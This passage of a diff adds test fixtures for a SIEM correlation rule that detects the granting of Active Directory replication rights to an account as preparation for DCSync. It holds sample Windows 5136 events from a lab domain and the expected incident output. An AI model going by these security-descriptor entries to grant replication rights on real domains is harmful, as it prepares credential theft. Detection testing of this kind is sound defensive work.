R;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-
00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-08T16:37:41.039Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-1108", "subject.account.name": "bob", "subject.account.session_id": "68101913", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-25T21:28:45.023Z", "type": "raw", "uuid": "10cb824f-e4df-48fd-8670-c129cae5e9a8"} +{"action": "modify", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5136\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14081\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-25T21:28:45.0236298Z\"},\"EventRecordID\":\"198242593\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"2868\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"OpCorrelationID\",\"text\":\"{57dccd4c-7381-4371-8480-d74d47019ad8}\"},{\"Name\":\"AppCorrelationID\",\"text\":\"-\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-1108\"},{\"Name\":\"SubjectUserName\",\"text\":\"bob\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40f2719\"},{\"Name\":\"DSName\",\"text\":\"insecurebank.local\"},{\"Name\":\"DSType\",\"text\":\"%%14676\"},{\"Name\":\"ObjectDN\",\"text\":\"DC=insecurebank,DC=local\"},{\"Name\":\"ObjectGUID\",\"text\":\"{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"ObjectClass\",\"text\":\"domainDNS\"},{\"Name\":\"AttributeLDAPDisplayName\",\"text\":\"nTSecurityDescriptor\"},{\"Name\":\"AttributeSyntaxOID\",\"text\":\"2.5.5.15\"},{\"Name\":\"AttributeValue\",\"text\":\"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049
e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)
(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)\"},{\"Name\":\"OperationType\",\"text\":\"%%14674\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "chain_id": "{57dccd4c-7381-4371-8480-d74d47019ad8}", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5136_A_directory_service_object_was_modified", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5136", "normalized": true, "object": "ds_object", "object.id": "{c6faf700-bfe4-452a-a766-424f84c29583}", "object.name": "DC=insecurebank,DC=local", "object.property": "nTSecurityDescriptor", "object.state": "value added", "object.type": 
"domainDNS", "object.value": "O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1
131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-08T16:37:41.039Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-1108", "subject.account.name": "bob", "subject.account.session_id": "68101913", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": 
"2019-03-25T21:28:45.023Z", "type": "raw", "uuid": "f28a2057-aea4-4699-968a-f82504a7a7dc"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Account Manipulation", "correlation_name": "DCSync_prepare_Add_replicatation_rights_to_Account", "correlation_type": "incident", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "DCSync_prepare_Add_replicatation_rights_to_Account|dc1.insecurebank.local|s-1-5-21-738609754-2819869699-4189121830-1108", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "ds_object", "object.id": "{c6faf700-bfe4-452a-a766-424f84c29583}", "object.name": "DC=insecurebank,DC=local", "object.property": "nTSecurityDescriptor", "object.state": "value added", "object.type": "domainDNS", "object.value": 
"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04f
c2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-1108", "subject.account.name": "bob", "subject.account.session_id": "68101913"} 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_2.sc new file mode 100644 index 00000000..bfb2d73a --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_2.sc 
@@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5136\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14081\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-25T21:28:45.0226312Z\"},\"EventRecordID\":\"198242588\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"896\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"OpCorrelationID\",\"text\":\"{2ea9670c-f0f9-4d3f-90e5-a087e8c05863}\"},{\"Name\":\"AppCorrelationID\",\"text\":\"-\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-1108\"},{\"Name\":\"SubjectUserName\",\"text\":\"bob\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40f2719\"},{\"Name\":\"DSName\",\"text\":\"insecurebank.local\"},{\"Name\":\"DSType\",\"text\":\"%%14676\"},{\"Name\":\"ObjectDN\",\"text\":\"DC=insecurebank,DC=local\"},{\"Name\":\"ObjectGUID\",\"text\":\"{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"ObjectClass\",\"text\":\"domainDNS\"},{\"Name\":\"AttributeLDAPDisplayName\",\"text\":\"nTSecurityDescriptor\"},{\"Name\":\"AttributeSyntaxOID\",\"text\":\"2.5.5.15\"},{\"Name\":\"AttributeValue\",\"text\":\"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00
c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e